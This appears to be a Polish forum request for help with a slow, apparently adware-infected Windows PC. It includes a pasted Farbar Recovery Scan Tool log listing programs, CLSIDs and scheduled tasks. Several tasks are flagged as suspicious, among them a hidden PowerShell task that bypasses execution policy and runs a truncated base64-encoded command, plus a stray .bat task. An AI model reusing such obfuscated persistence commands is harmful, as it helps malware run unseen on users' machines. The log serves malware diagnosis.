Addition.txt

prośba o analizę FRST, jakiś uciążliwy proces DLL

podczas uruchamiania widoczne jakieś Bubble jako proces dll, odczuwalne spowolnienie pracy systemu. Prośba o analizę FRST.

Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 01.09.2018 03
Uruchomiony przez Arek (07-09-2018 11:18:18)
Uruchomiony z G:\ODWIRUSOWANIE2404\32
Microsoft Windows 10 Pro Wersja 1511 10586.71 (X86) (2015-12-21 20:30:23)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-3402518616-1825306349-2235242046-500 - Administrator - Disabled)
Arek (S-1-5-21-3402518616-1825306349-2235242046-1000 - Administrator - Enabled) = & gt; C:\Users\Arek
Gość (S-1-5-21-3402518616-1825306349-2235242046-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3402518616-1825306349-2235242046-1007 - Limited - Enabled)
Konto domyślne (S-1-5-21-3402518616-1825306349-2235242046-503 - Limited - Disabled)
postgres (S-1-5-21-3402518616-1825306349-2235242046-1005 - Limited - Enabled) = & gt; C:\Users\postgres

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą " Hidden " w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 17.0.0.124 - Adobe Systems Incorporated)
Adobe Flash Player 22 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Aktualizacja produktu Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0415-0000-0000000FF1CE}_STANDARD_{04E205D6-88B1-4652-B162-42DF2C3B1228}) (Version: - Microsoft)
Aktualizacja produktu Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0415-0000-0000000FF1CE}_STANDARD_{442ECBCF-94A7-48CC-8CD9-D31FFFD5FA86}) (Version: - Microsoft)
Aktualizacja produktu Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0415-0000-0000000FF1CE}_STANDARD_{128A36ED-21BE-4547-9FFE-5B85AEC735DD}) (Version: - Microsoft)
AS Asystent Sprzedaży (HKLM\...\{714840DE-2649-4C45-9F73-31D34D830354}) (Version: 6.0.5.0 - Fast-Software FAST M.J. Orszańscy s. j.) Hidden
AS Asystent Sprzedaży (HKLM\...\AS Asystent Sprzedaży) (Version: - Fast-Software)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 20.0.20.1143 - Bitdefender)
Bubble Browser (HKU\S-1-5-21-3402518616-1825306349-2235242046-1000\...\{293702D5-E188-3E32-8216-2E4F73652F8E}) (Version: 1.3.0 - Snowball corp) & lt; ==== UWAGA
Bullzip PDF Printer 7.1.0.1218 (HKLM\...\Bullzip PDF Printer_is1) (Version: 7.1.0.1218 - Bullzip)
Canon Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version: - )
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version: - )
Canon IJ Network Tool (HKLM\...\Canon_IJ_Network_UTILITY) (Version: - )
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM\...\CANONIJPLM100) (Version: - )
Canon MP Navigator EX 4.0 (HKLM\...\MP Navigator EX 4.0) (Version: - )
Canon MP495 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP495_series) (Version: - )
Canon My Printer (HKLM\...\CanonMyPrinter) (Version: - )
Canon Solution Menu EX (HKLM\...\CanonSolutionMenuEX) (Version: - )
DNS Unlocker version 1.4 (HKLM\...\{E1527582-8509-4011-B922-29E3FB548882}_is1) (Version: 1.4 - www.dnsunlocker.com) & lt; ==== UWAGA
Dodatek Zapisywanie jako PDF lub XPS firmy Microsoft dla programów pakietu Microsoft Office 2007 (HKLM\...\{90120000-00B2-0415-0000-0000000FF1CE}) (Version: 12.0.4518.1020 - Microsoft Corporation)
EasyBCD 2.0 (HKLM\...\EasyBCD) (Version: 2.0 - NeoSmart Technologies)
e-Deklaracje Desktop (HKLM\...\{A9C774C3-E220-FD19-65A8-9A8651F661EB}) (Version: 7.0.1 - Ministerstwo Finansow) Hidden
e-Deklaracje Desktop (HKLM\...\e-Deklaracje.A1909296681C7ACEFE45687D3A64758C8659BF46.1) (Version: 7.0.1 - Ministerstwo Finansow)
face2face Second edition Upper Intermediate application (HKLM\...\{D9829301-1BAB-79DF-8D35-210B1DAC44A4}) (Version: 1.0.0 - Cambridge University Press Holdings Limited) Hidden
face2face Second edition Upper Intermediate application (HKLM\...\face2faceSecondeditionUpperIntermediate) (Version: 1.0.0 - Cambridge University Press Holdings Limited)
face2face Second edition Upper Intermediate content (HKLM\...\face2face Second edition Upper Intermediate content) (Version: 1.0.0.0 - Cambridge University Press)
Google Update Helper (HKLM\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
GPL Ghostscript Lite 8.70 (HKLM\...\GPL Ghostscript Lite_is1) (Version: - )
HDAUDIO Soft Data Fax Modem with SmartCP (HKLM\...\CNXT_MODEM_HDAUDIO_VEN_14F1 & DEV_2BFAOR2C06_118) (Version: - )
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
Intel(R) TV Wizard (HKLM\...\TVWiz) (Version: - Intel Corporation)
Itibiti RTC (HKLM\...\{730E03E4-350E-48E5-9D3E-4329903D454D}) (Version: 0.0.1 - Itibiti Inc) Hidden & lt; ==== UWAGA
Java 8 Update 51 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0012-0000-0000-0000000FF1CE}_STANDARD_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Standard 2007 (HKLM\...\STANDARD) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
pgAdmin III 1.8 (HKLM\...\{B4A52A73-B0B7-4BDA-BAED-83D054F63FAE}) (Version: 1.8 - The pgAdmin Development Team)
PostgreSQL 8.3 (HKLM\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PowerISO (HKLM\...\PowerISO) (Version: 4.6 - PowerISO Computing, Inc.)
Rejestracja użytkownika drukarki Canon MP495 series (HKLM\...\Rejestracja użytkownika drukarki Canon MP495 series) (Version: - )
swMSM (HKLM\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.1 - Synaptics Incorporated)
Texas Instruments PCIxx21/x515/xx12 drivers. (HKLM\...\InstallShield_{BE1826A9-7EEE-492A-B3BC-DEF3DFAE37EE}) (Version: 2.00.0002 - Texas Instruments Inc.)
TIPCI (HKLM\...\{BE1826A9-7EEE-492A-B3BC-DEF3DFAE37EE}) (Version: 2.00.0002 - Texas Instruments Inc.) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0012-0000-0000-0000000FF1CE}_STANDARD_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
VBA (2627.01) (HKLM\...\{5545EEE1-FA36-4F76-B6BE-5696E7F4E2D6}) (Version: 6.03.00.9402 - Microsoft Corporation) Hidden
VLC media player 1.1.11 (HKLM\...\VLC media player) (Version: 1.1.11 - VideoLAN)
Windows Media Player Firefox Plugin (HKLM\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version: - )

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000_Classes\CLSID\{28B7AA99-C0F9-4C47-995E-8A8D729603A1}\localserver32 - & gt; C:\ProgramFiles\AutoCAD2009\acad.exe /Automation = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000_Classes\CLSID\{2F1F7574-ECCA-4361-B4DE-C411BF7EEE23}\localserver32 - & gt; C:\ProgramFiles\AutoCAD2009\acad.exe /Automation = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000_Classes\CLSID\{6AB55F46-2523-4701-A912-B226F46252BA}\localserver32 - & gt; C:\ProgramFiles\AutoCAD2009\acad.exe /Automation = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000_Classes\CLSID\{6D7AE628-FF41-4CD3-91DD-34825BB1A251}\localserver32 - & gt; C:\Program Files\AutoCAD 2010\acad.exe /Automation = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000_Classes\CLSID\{7AABBB95-79BE-4C0F-8024-EB6AF271231C}\localserver32 - & gt; C:\ProgramFiles\AutoCAD2009\acad.exe = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000_Classes\CLSID\{D166BD15-03AF-413A-BEFD-0679FF410B49}\InprocServer32 - & gt; C:\Users\Arek\AppData\Local\Dropbox\Update\1.3.27.29\psuser.dll = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000_Classes\CLSID\{D70E31AD-2614-49F2-B0FC-ACA781D81F3E}\localserver32 - & gt; C:\Program Files\AutoCAD 2010\acad.exe = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 - & gt; C:\Program Files\AutoCAD 2010\acadficn.dll = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1005_Classes\CLSID\{28B7AA99-C0F9-4C47-995E-8A8D729603A1}\localserver32 - & gt; C:\ProgramFiles\AutoCAD2009\acad.exe /Automation = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1005_Classes\CLSID\{2F1F7574-ECCA-4361-B4DE-C411BF7EEE23}\localserver32 - & gt; C:\ProgramFiles\AutoCAD2009\acad.exe /Automation = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1005_Classes\CLSID\{6AB55F46-2523-4701-A912-B226F46252BA}\localserver32 - & gt; C:\ProgramFiles\AutoCAD2009\acad.exe /Automation = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1005_Classes\CLSID\{7AABBB95-79BE-4C0F-8024-EB6AF271231C}\localserver32 - & gt; C:\ProgramFiles\AutoCAD2009\acad.exe = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3402518616-1825306349-2235242046-1005_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 - & gt; C:\ProgramFiles\AutoCAD2009\acadficn.dll = & gt; Brak pliku
ContextMenuHandlers1: [PowerISO] - & gt; {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} = & gt; C:\Program Files\PowerISO\PWRISOSH.DLL [2009-11-08] (PowerISO Computing, Inc.)
ContextMenuHandlers1: [WinRAR] - & gt; {B41DB860-8EE4-11D2-9906-E49FADC173CA} = & gt; C:\Program Files\WinRAR\rarext.dll [2010-03-15] ()
ContextMenuHandlers4: [PowerISO] - & gt; {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} = & gt; C:\Program Files\PowerISO\PWRISOSH.DLL [2009-11-08] (PowerISO Computing, Inc.)
ContextMenuHandlers4: [WinRAR] - & gt; {B41DB860-8EE4-11D2-9906-E49FADC173CA} = & gt; C:\Program Files\WinRAR\rarext.dll [2010-03-15] ()
ContextMenuHandlers5: [Gadgets] - & gt; {6B9228DA-9C15-419e-856C-19E768A13BDC} = & gt; - & gt; Brak pliku
ContextMenuHandlers5: [igfxcui] - & gt; {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} = & gt; - & gt; Brak pliku
ContextMenuHandlers6: [PowerISO] - & gt; {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} = & gt; C:\Program Files\PowerISO\PWRISOSH.DLL [2009-11-08] (PowerISO Computing, Inc.)
ContextMenuHandlers6: [WinRAR] - & gt; {B41DB860-8EE4-11D2-9906-E49FADC173CA} = & gt; C:\Program Files\WinRAR\rarext.dll [2010-03-15] ()

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {00321EDC-D562-4AFA-99A2-8358A408D2B4} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {0B38BDCE-DF73-4CE2-8B99-DC5C1F5A4641} - \Bubble Browser - & gt; Brak pliku & lt; ==== UWAGA
Task: {0C617288-AAFD-479F-A57A-CFD3B9604A33} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart = & gt; C:\WINDOWS\ehome\ehrec.exe
Task: {0FE35C3F-F52E-499A-B37B-E41499E8A322} - System32\Tasks\CIMT_daily_S-1-5-21-3402518616-1825306349-2235242046-1000 = & gt; C:\Program Files\Consumer Input\Monitoring\dca-monitoring.exe
Task: {101EF0D2-D37C-4DF3-936E-719577A285CB} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 = & gt; C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-01-15] (Bitdefender)
Task: {1697250D-AA9D-43E0-A654-C59337F3AF45} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d - & gt; Brak pliku & lt; ==== UWAGA
Task: {17712773-09DF-4709-8E1D-DFA5FDA8B46F} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime - & gt; Brak pliku & lt; ==== UWAGA
Task: {2096099F-F714-4F52-952C-A71A3EE5476C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry = & gt; C:\WINDOWS\ehome\MCUpdate.exe
Task: {2B4D6F42-8A61-416E-8705-21B56048283E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d - & gt; Brak pliku & lt; ==== UWAGA
Task: {3E182B95-EA52-47C6-90BA-9FEB0071048B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4132F0E7-B205-4466-9C51-37EB07934D4F} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime - & gt; Brak pliku & lt; ==== UWAGA
Task: {42CB6A6E-5A3D-49D0-B231-FF52E7120A2E} - \Bubble Browser2 - & gt; Brak pliku & lt; ==== UWAGA
Task: {4C204D33-2A2B-4C18-95E5-F4A5C737C8E5} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d - & gt; Brak pliku & lt; ==== UWAGA
Task: {4C8C1F65-212C-4C65-A495-4BF864160ADC} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled = & gt; C:\WINDOWS\ehome\mcupdate.exe
Task: {4D3D3CC5-8F4E-407A-A127-7E0F604076DE} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask = & gt; C:\WINDOWS\ehome\mcupdate.exe
Task: {4E564F1B-BF21-4243-99A2-8E28BA6DAF0B} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4F260DDC-EAD7-4B11-84E1-EA527EAE1F7F} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {5AD56EC1-CF1A-4CEC-84B6-3FC596DE81C0} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask = & gt; C:\WINDOWS\ehome\mcupdate.exe
Task: {5BEC1C05-BB09-4F29-A2EF-305D6C2420E9} - System32\Tasks\Norton Identity Safe\Norton Error Processor = & gt; C:\Program Files\Norton Safe Web Lite\Engine\2013.3.3.19\SymErr.exe
Task: {61FFAE77-D4E2-4E76-8E0A-035BF7060803} - System32\Tasks\CreateChoiceProcessTask = & gt; C:\Windows\System32\browserchoice.exe
Task: {6AE825E9-0726-4980-A135-50B4DA0BD485} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6B1AD686-5B13-49D8-83A8-7CF51E1ACD33} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6F224301-1187-44BA-B413-D9840132E150} - \{4804D758-7F2B-B4A1-7425-8B5152D39E01} - & gt; Brak pliku & lt; ==== UWAGA
Task: {75642297-8095-4FAB-B7E8-6075C852B7BC} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {78EEC18C-A2A8-482C-938E-1D52F6B57179} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {7CE16CA9-2651-4081-B557-D71ACEC27965} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording = & gt; C:\WINDOWS\ehome\ehrec.exe
Task: {81686FB7-3BD8-465E-ACC5-140D9739B43A} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer = & gt; C:\Program Files\Norton Safe Web Lite\Engine\2013.3.3.19\SymErr.exe
Task: {8570F90F-885A-462D-BADF-93CA27A9836B} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask = & gt; C:\WINDOWS\ehome\mcupdate.exe
Task: {8A106CCA-62FA-4E07-B62D-4F3E64873BC8} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask = & gt; C:\WINDOWS\ehome\mcupdate.exe
Task: {903B2C91-3710-4D89-A701-F1370FD95EB4} - \Wopuxaumak - & gt; Brak pliku & lt; ==== UWAGA
Task: {9A6B52B8-1399-483B-839F-731A5261D6FE} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask = & gt; C:\WINDOWS\ehome\mcupdate.exe
Task: {9E0E6DF3-CF35-47F5-A26C-B65AD0F46CAE} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate = & gt; C:\WINDOWS\ehome\mcupdate.exe
Task: {A154E4AA-27CB-43F1-982B-3D9BC2FCE5DF} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A52C1D53-46F9-4C55-B3A6-3D70CEF3894F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess - & gt; Brak pliku & lt; ==== UWAGA
Task: {A59F60BD-0AA7-4B5C-8B4C-623D0D3E897F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {ADBF0478-85EA-49DF-A5BD-1DFDC99EFFD5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig - & gt; Brak pliku & lt; ==== UWAGA
Task: {B687B39A-C54D-4234-8843-7D872C4B8B8B} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d - & gt; Brak pliku & lt; ==== UWAGA
Task: {B6ED2C40-C5DF-4C9A-9CEA-F3E08F5A090F} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C39DE5E4-678E-46D8-93C6-1163974D5F65} - System32\Tasks\{69F904BF-60EE-4A27-9C95-0CAA83641F76} = & gt; C:\Windows\system32\pcalua.exe -a C:\v1.35\Winflash32\CLB-135.EXE -d C:\v1.35\Winflash32
Task: {C83263E3-8940-4CA0-BF26-E442C00D49D5} - System32\Tasks\{78CB4FB7-59FF-4465-B9E3-66B87E1FC43C} = & gt; C:\Windows\system32\pcalua.exe -a C:\ProgramData\TVTime\uninstall.exe -c /kb=y /ic=1
Task: {D08DBAE6-7C13-43C6-96EB-CEA452BF86E4} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B - & gt; Brak pliku & lt; ==== UWAGA
Task: {D4D57A1A-A6C3-4961-B7AC-C8523882C9E9} - System32\Tasks\{C59FF22F-38BE-413F-9E29-E4A2DB883AD8} = & gt; C:\Windows\system32\pcalua.exe -a " G:\PLAY ONLINE\Setup.exe " -d " G:\PLAY ONLINE "
Task: {DCFCD914-8893-4A49-BB16-DFFD1C28A48B} - System32\Tasks\Sictekco = & gt; C:\PROGRA~1\SHOPPE~2\Icyiea.bat & lt; ==== UWAGA
Task: {DD3F2594-239E-4E5F-9C76-81429349264C} - System32\Tasks\Adobe Flash Player Updater = & gt; C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-08-26] (Adobe Systems Incorporated)
Task: {DE1E5552-BD59-4419-ABD2-251F56BB76D6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d - & gt; Brak pliku & lt; ==== UWAGA
Task: {E8B97622-9BD5-4F57-B350-8E9B0012F437} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {EC9A91BE-9E9D-4502-AFA9-B0BE938020DA} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks = & gt; C:\WINDOWS\ehome\ehPrivJob.exe
Task: {EFD1EC8C-7178-4CAA-9FFE-03F30981B979} - System32\Tasks\{0E050547-047A-7E09-7811-7D0F7F0C1179} = & gt; C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (dane wartości zawierają 9392 znaków więcej). & lt; ==== UWAGA
Task: {F332E383-6796-4D38-8C0B-F3E2997F5177} - System32\Tasks\DNSKALAMAZOO = & gt; dnskalamazoo.exe & lt; ==== UWAGA
Task: {F9E6898A-32AB-4D02-B1CB-D8E0403B586A} - System32\Tasks\CIMT_S-1-5-21-3402518616-1825306349-2235242046-1000 = & gt; C:\Program Files\Consumer Input\Monitoring\dca-monitoring.exe
Task: {FC0F2953-9A1B-4C25-81C1-712E14B1692C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB = & gt; C:\WINDOWS\system32\MRT.exe [2016-01-21] (Microsoft Corporation)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job = & gt; C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CIMT_daily_S-1-5-21-3402518616-1825306349-2235242046-1000.job = & gt; C:\Program Files\Consumer Input\Monitoring\dca-monitoring.exe
Task: C:\WINDOWS\Tasks\CIMT_S-1-5-21-3402518616-1825306349-2235242046-1000.job = & gt; C:\Program Files\Consumer Input\Monitoring\dca-monitoring.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job = & gt; C:\WINDOWS\explorer.exe

==================== Skróty & WMI ========================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)


==================== Załadowane moduły (filtrowane) ==============

2015-10-30 01:44 - 2015-10-30 01:44 - 000149504 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2008-06-08 23:58 - 2008-06-08 23:58 - 000167936 _____ () C:\Postgres\bin\LIBPQ.dll
2006-11-06 13:18 - 2006-11-06 13:18 - 000963584 _____ () C:\Postgres\bin\libxml2.dll
2005-07-20 01:48 - 2005-07-20 01:48 - 000059904 _____ () C:\Postgres\bin\zlib1.dll
2008-02-04 17:43 - 2008-02-04 17:43 - 000027136 _____ () C:\Postgres\lib\plugins\plugin_debugger.dll
2015-12-21 07:02 - 2015-12-21 07:02 - 001859448 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-11 16:26 - 2016-10-11 16:26 - 000679624 _____ () C:\Users\Arek\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll
2011-04-21 07:01 - 2010-03-15 05:28 - 000141824 _____ () C:\Program Files\WinRAR\rarext.dll
2015-12-21 07:02 - 2015-12-21 07:02 - 000070656 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-21 07:02 - 2015-12-21 07:02 - 000316416 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-21 17:38 - 2016-01-04 21:23 - 005340672 ____C () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-21 17:38 - 2016-01-04 21:19 - 000471552 ____C () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-28 12:07 - 2016-01-16 01:06 - 002366464 ____C () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-28 12:07 - 2016-01-16 01:09 - 002656768 ____C () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)

AlternateDataStreams: C:\ProgramData\TEMP:D1B5B4F1 [112]

==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość " AlternateShell " zostanie przywrócona.)


==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)

HKU\S-1-5-21-3402518616-1825306349-2235242046-1000\Software\Classes\.scr: AutoCADScriptFile = & gt;

==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

IE trusted site: HKU\S-1-5-21-3402518616-1825306349-2235242046-1000\...\pekaobiznes24.pl - & gt; hxxps://www.pekaobiznes24.pl

==================== Hosts - zawartość: ==========================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2009-07-13 22:04 - 2016-08-31 23:57 - 000000952 ____C C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-3402518616-1825306349-2235242046-1000\Control Panel\Desktop\\Wallpaper - & gt; C:\Windows\web\wallpaper\Windows\img0.jpg
HKU\S-1-5-21-3402518616-1825306349-2235242046-1005\Control Panel\Desktop\\Wallpaper - & gt;
DNS Servers: Urządzenie nie jest podłączone do internetu.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System = & gt; (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
